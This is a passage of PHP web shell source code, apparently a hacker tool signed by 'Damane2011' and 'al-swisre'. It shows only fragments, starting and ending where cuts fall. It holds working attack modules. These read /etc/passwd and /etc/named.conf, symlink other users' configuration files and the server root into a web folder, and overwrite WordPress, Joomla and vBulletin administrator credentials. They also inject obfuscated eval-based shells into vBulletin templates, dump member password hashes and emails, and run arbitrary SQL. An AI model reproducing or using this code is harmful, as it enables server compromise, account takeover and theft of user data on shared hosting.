1BPU1RbInN5bWxpbmsiXSkpew0KDQokY29uZmlncyA9IGV4cGxvZGUoIlxuIiwkX1BPU1RbImNvbmZpZ3MiXSk7DQoNCiRwdWJsaWMgPSAkX1BPU1RbJ3B1YmxpYyddOw0KDQokaG9tZSA9ICRfUE9TVFsnaG9tZSddOw0KDQokcGFzc3dkID0gZm9wZW4oIi9ldGMvcGFzc3dkIiwgInJiIik7IC8vIFJlYWQgUGFzc3dkIEZpbGUNCg0Kd2hpbGUgKCFmZW9mKCRwYXNzd2QpICkgew0KJGxpbmVzID0gZmdldHMoJHBhc3N3ZCk7IC8vID4+IEdldCBDb250ZW50cyBPZiBUaGUgUGFzc3dkIEZpbGUNCiR1c2VyID0gZXhwbG9kZSgnOicsICRsaW5lcyk7IC8vIEV4cGxvZGUgVGhlIFBhc3N3ZCBGaWxlIEJ5IDoNCg0KZmlsZV9wdXRfY29udGVudHMoInVzZXJzLnR4dCIgLCAkdXNlclswXS4iXG4iLCBGSUxFX0FQUEVORCk7IC8vIFdyaXRlIEEgTmV3IEZpbGUgQ29udGFpbiBVc2Vycw0KDQovLyBTdGFyVCBTeW1saW5raW5nIC4uLg0KDQpmb3JlYWNoICgkY29uZmlncyBhcyAkY29uZmlnKXsNCg0KLy8gc3lzdGVtKCJsbiAtcyAkaG9tZS8kdXNlclswXSRwdWJsaWMvJGNvbmZpZyAkdXNlclswXS0kY29uZmlnLnR4dFxuIik7DQoNCnN5bWxpbmsoJGhvbWUuJy8nLiR1c2VyWzBdLiRwdWJsaWMuJy8nLiRjb25maWcsICR1c2VyWzBdLidfJy4kY29uZmlnLicudHh0Jyk7DQoNCg0KLy8gJHN5bSA9ICR1c2VyWzBdLSRjb25maWcuJy50eHQnOw0KDQppZihmaWxlX2V4aXN0cygkc3ltKSl7DQogICAgZWNobyAiU3ltbGluayBPZiBUaGUgQ29uZmlnIEZvciBUaGUgVXNlciAkdXNlclswXSBJcyBIZXJlOiAkc3ltIjsNCn0NCi8vIERvbmUgU3ltaWxua2luZyA6cA0KfQ0KLy8gRU9GIQ0KfQ0KLy8gR2VuZXJhdGUgLmh0YWNjZXNzIERlbGV0ZSAvLyBUbyBBY3RpdmF0ZSBUaGUgQWN0aW9uIDpwDQovLyBmaWxlX3B1dF9jb250ZW50cygiLmh0YWNjZXNzIiAsICJBZGRIYW5kbGVyIHBocC1zY3JpcHQgLnR4dFxuQWRkVHlwZSB0ZXh0L2h0bWwgaHRtIGh0bWwgcGhwXG4iLCBGSUxFX0FQUEVORCk7DQoNCi8vIE9oIEZpbmFsbFkgOnAgISENCnByaW50ICI8cCBhbGlnbj0nY2VudGVyJz48Zm9udCBjb2xvcj0nI0Y2MzU4QScgc2l6ZT0nNCc+RG9uRSAhPC9wPiI7DQp9DQo/Pg0KPHA+ICZuYnNwOzwvcD4NCjxwPiAmbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBjb2xvcj0iI0Y2MzU4QSIgc2l6ZT0iNCI+QnkgRGFtYW5lMjAxMShEYW1hbmUtRHpAaG90bWFpbC5jb20pPC9mb250Pjxicj48YnI+DQpNYURlIGluIEFsR2VyaWEgMjAxMiAmY29weTwvcD4NCjwvaGVhZD4NCjwvaHRtbD5=';$file = fopen("config_grabber.php" ,"w+");$write = fwrite ($file ,base64_decode($local_exp));fclose($file);echo "";}elseif ($action == 'domain') {$d0mains = @file("/etc/named.conf");if(!$d0mains){ die("# can't ReaD -> [ /etc/named.conf ]"); }echo "";foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo ""; flush();}}};}elseif ($action == 'wpchange') {if(empty($_POST['pwd'])){echo "host : database :

username : password :

 

Set A New username 4 Login :

Set A New password 4 Login :

";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$pwd = $_POST['pwd'];$admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());if($a4s){echo " Success :now use a new user and pass 2 login in the admin panel ";}}}elseif ($action == "symlinker") {@error_reporting(E_ALL ^ E_NOTICE);@ini_set('error_log',NULL);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@set_time_limit(0);@set_magic_quotes_runtime(0);echo "
";echo "

Server Symlinker

"; @mkdir('sym',0777);$htaccess_contents = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$htaccess_file =@fopen ('sym/.htaccess','w');fwrite($htaccess_file ,$htaccess_contents);@symlink('/','sym/root');$basename = basename('_FILE_');$named_conf = @file('/etc/named.conf');if(!$named_conf){echo "

Sorry..Can't access '/etc/named.conf' file on server

"; }else{echo "
d0mains users
This is the hidden content, please
".$user['name']."
";foreach($named_conf as $named_conf1){if(@eregi('zone',$named_conf1)){preg_match_all('#zone "(.*)"#',$named_conf1,$url);flush();if(strlen(trim($url[1][0])) >2){$user = @posix_getpwuid(@fileowner('/etc/valiases/'.$url[1][0]));$sym = $user['name'] ;@symlink('/','sym/root');$sym = $url[1][0];echo "";flush();}}}}}elseif($action == "passwd") {show_source('/etc/passwd'); }elseif ($action == 'sql_cmd') {@chdir('damane');$symlinker = '<head>
<title>SQL CMD 3.0 | al-swisre</title>
<meta http-equiv="content=type"  content="text/html; charset=utf-8" />
<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}


body {
    direction: rtl;
 background-color: #000000;
	color: #cccccc;
     }

input,textarea,select{
font-weight: bold;
color: #cccccc;
dashed #ffffff;
border: 1px
solid #2C2C2C;
background-color: #080808
}


.all
{
  margin-left: auto;
  margin-right: auto;
  width: 60%;
  box-shadow: 0px 0px 4px #888888;
  direction: ltr;

}
.hdr{
  font-family:Tahoma, Arial, sans-serif;
  font-size: 27px;
  color:#BBBBBB;
  font-weight: bold;
  text-align: center;
}
.com{

  font-size: 18px;
  font-family:Tahoma, Arial, sans-serif;
  color: #BBBBBB;
  text-shadow: #FF0000;
}

.foter{
  font-size: 9pt;
  color:  #444444 ;
  text-align: center
}
#drp{
  width:150px;
  position: absolute;

  float: none;

}


#rok{
  text-decoration: none;
  padding : 4px;
  list-style: none;
  float: left;
}
#rok a{
  text-decoration: none;
  color: #cccccc;
  font-size: 10pt;
  margin-left: 2px;
  list-style: none;
  padding : 4px;

}
.nvbr{
  border-top: 1px #222222 dashed;
  height: 33px;
  background: #000000;
  border-bottom: 1px #222222 dashed;
  font-family: Tahoma, Arial, sans-serif ;
  font-weight: bold;
}

.nvbr ul{
 list-style: none;
 margin: 0;
 padding: 0;

}

.nvbr ul li{
  float: left;

}

.nvbr ul li a{
 display: block;
 text-decoration: none;
 padding: 10px 9px 10px 9px;
  color: #999999   ;
  font-size: 12px;
}

.nvbr ul li a:hover{
 color: #FFFFFF;
 box-shadow: 0px 0px 3px #cccccc ;
 text-shadow: 0px 0px 3px #FFFFFF;
}

#drp{
 list-style: none;
 direction: ltr;
  width:150px;
  position: absolute;
  display: none;
  border-bottom:solid 1px #222222;
  border-left: solid 1px #222222;
  border-right: solid 1px #222222;
}

#drp{
  float: none;
}

#rok:hover #drp{
 display: block;
 background: #000000;
 }
 .tbm{
 font-size: 14px;
}

.tbm tr td{
 border: dashed 1px #111111;

}





</style>
</head>

<body>
<br />
<div class="all" >

<br /><div class="hdr">SQL CMD 3.0</div><br />
<?php
$peag = basename(__FILE__);

echo'
<div class="nvbr">
 <ul>
 <li><a href="'.$peag.'">SQL CMD</a>

 </li>
 </ul>

 <ul>
 <li id="rok"><a href="">vBulletin</a>

 <div id="drp">
 <ul><a href="?sws=1" >Inject index</a> </ul>
 <ul><a href="?sws=4" >Inject faq</a> </ul>
 <ul><a href="?sws=5" >Inject calendar</a> </ul>
 <ul><a href="?sws=6" >Inject search</a> </ul>
 <ul><a href="?sws=7" >show members</a> </ul>
 </div>

 </li>
 </ul>

  </ul>

 <ul>
 <li id="rok"><a href="">WordPress</a>

 <div id="drp">
 <ul><a href="?sws=2" >Change admin</a> </ul>
 <ul><a href="?sws=8" >show members</a> </ul>
 </div>

 </li>
 </ul>

  <ul>
 <li id="rok"><a href="">Joomla</a>

 <div id="drp">
 <ul><a href="?sws=3" >Change admin</a> </ul>
 <ul><a href="?sws=9" >show members</a> </ul>
 </div>

 </li>
 </ul>

</div>';
?>

<?php


$shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{

case 1:

echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
     <td >Your index :</td>
     <td><textarea rows="3" name="index"></textarea></td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';
// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb >>>>>>>>>>>>>>>>>>>>>>>>
 $host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$index=str_replace("\'","'",$index);
$crypt  = "{\${eval(base64_decode(\'";
$crypt .= base64_encode("echo \"$index\";");
$crypt .= "\'))}}{\${exit()}}</textarea>";
$sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
$query =@ mysql_query($sqlindex,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;


// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< wp >>>>>>>>>>>>>>>>>>>>>>>>

  case 2:

  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table cellpadding="4" align="center" width="45%" class="tab">

<tr>
     <td>user admin&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="useradmin" /></td>
</tr>
<tr>
     <td>pass admin&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="passadmin" /></td>
</tr>

<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form> </div>';

$host       = $_POST['host'];
$user       = $_POST['user'];
$pass       = $_POST['pass'];
$db         = $_POST['db'];
$useradmin  = $_POST['useradmin'];
$pass_ad    = $_POST['passadmin'];



if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;

$crypt = crypt($pass_ad);


$query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die;
$query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;



if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}



  break;



// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< joomla >>>>>>>>>>>>>>>>>>>>>>>>

  case 3:
  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table cellpadding="4" align="center" width="50%" class="tab">

<tr>
     <td>dbprefix&nbsp;&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="jop" value="jos_users" /></td>
</tr>


<tr>
     <td>Email admin&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="email" /></td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form> </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$jop  = $_POST['jop'];
$email  = $_POST['email'];

if(isset($host) ) {
$con =  @ mysql_connect($host,$user,$pass) or die ;
$sedb = @ mysql_select_db($db) or die;


$query= @ mysql_query("UPDATE $jop SET email ='".$email."' WHERE id = 1") or die;



if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}


  break;
// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell FAQ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  case 4:
  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>

</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>Injection Shell in faq.php</center><br /> </td>
</tr>

<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$faq  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
$query =@ mysql_query($sqlfaq,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;



// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell CALENDAR >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  case 5:
echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>Injection Shell in calendar.php</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';
//
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'" ;
$query =@ mysql_query($sqlfaq,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;

// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell search >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  case 6:
echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>Injection Shell in search.php</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell"; 
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'" ;
$query =@ mysql_query($sqlfaq,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;


// <<<<<<<<<<<<<<<<<<<<<< vb members >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  case 7:

  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>show members Information</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$sql = 'select * from `user`';
$query =@ mysql_query($sql,$con);

if ($query)
{

while ($row = mysql_fetch_assoc($query))
{

echo "
<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
<tr>
       <td>ID :</td>
       <td>user :</td>
       <td>pass :</td>
       <td>salt :</td>
       <td>email :</td>

</tr>

<tr>
       <td>".$row['userid']."</td>
       <td>".$row['username']."</td>
       <td>".$row['password']."</td>
        <td>".$row['salt']."</td>
        <td>".$row['email']."</td>
</tr>

</table>
                                                     -
  ";

}

  }
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}


  break;

  case 8:


  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>show members Information</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$sql = 'select * from `wp_users`';
$query =@ mysql_query($sql,$con);

if ($query)
{

while ($row = mysql_fetch_assoc($query))
{

echo "
<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
<tr>
       <td>ID :</td>
       <td>user :</td>
       <td>pass :</td>
       <td>email :</td>

</tr>

<tr>
       <td>".$row['ID']."</td>
       <td>".$row['user_login']."</td>
       <td>".$row['user_pass']."</td>
        <td>".$row['user_email']."</td>
</tr>

</table>

  ";

}

  }
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}


  break;


    case 9:


  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">


<tr>
     <td>Table user :</td>
     <td colspan="6"><input type="text" name="jop" value="jos_users" /></td>
</tr>
</table>

<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>show members Information</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$jop  = $_POST['jop'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$sql = 'select * from `bo74r_users`';
$query =@ mysql_query($sql,$con);

if ($query)
{

while ($row = mysql_fetch_assoc($query))
{

echo "
<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
<tr>
       <td>ID :</td>
       <td>user :</td>
       <td>pass :</td>
       <td>email :</td>

</tr>

<tr>
       <td>".$row['id']."</td>
       <td>".$row['username']."</td>
       <td>".$row['password']."</td>
        <td>".$row['email']."</td>
</tr>

</table>

  ";

}

  }
else if (!$query)
{
  echo "error";
}
}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;
  default:
  header("Location: $peag");
  }
  }

else
{
echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
     <td >SQL CMD :</td>
     <td><textarea rows="3" name="sql"></textarea></td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form> </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$sql  = $_POST['sql'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;

$query =@ mysql_query($sql,$con) or die;

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
}
?>
</div>
<div class="foter"><br /><br />Cod3d by : al-swisre _ oy3@hotmail.com<br /> <br />Saudi Arabia h4x0rS</div>
<br />';$file = fopen("sql_cmd.php" ,"w+");$write = fwrite ($file ,$symlinker);fclose($file); echo "Click Here";}elseif ($action == 'joochange') {if(empty($_POST['pwd'])){echo "Host        :

Database :

Username :

Password :

Set A New Username For Login :

The Password is : SQL

";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$pwd = $_POST['pwd'];$admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());if($SQL){echo "Success

~ Coded By

Damane2011";}}}elseif($action == "vbchange") {if(empty($_POST['index'])){echo "
host : database :

username : password :

 

";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$index = $_POST['index']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error());$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_encode("echo \"$index\";");$set_index .= "\'))}}{\${exit()}}";$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());if($ok){echo "!! update finish !!

 

";}}}elseif($action == "configler") {@mkdir("config", 0755) or die("Can't Create A new Dir !!");@chdir("config");$hta = ".htaccess";$file_create = "$hta";$file = fopen ($file_create , 'w') or die ("Can't Open File !!");$htaccess = ""; $htaccess = "AddHandler cgi-script .damOptions allAddType text/plain .phpAddHandler server-parsed .phpAddType text/plain .html"; fwrite ( $file , $htaccess) ;fclose ($file);$configshell = '#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>.: Damane2011-Dz :.</title>
<style type="text/css">
.newStyle1 {
 font-family: Tahoma;
 font-size: x-large;
 color: #800080;
 background-color: #008000;
 text-align: center;
}
</style>
</head>
';
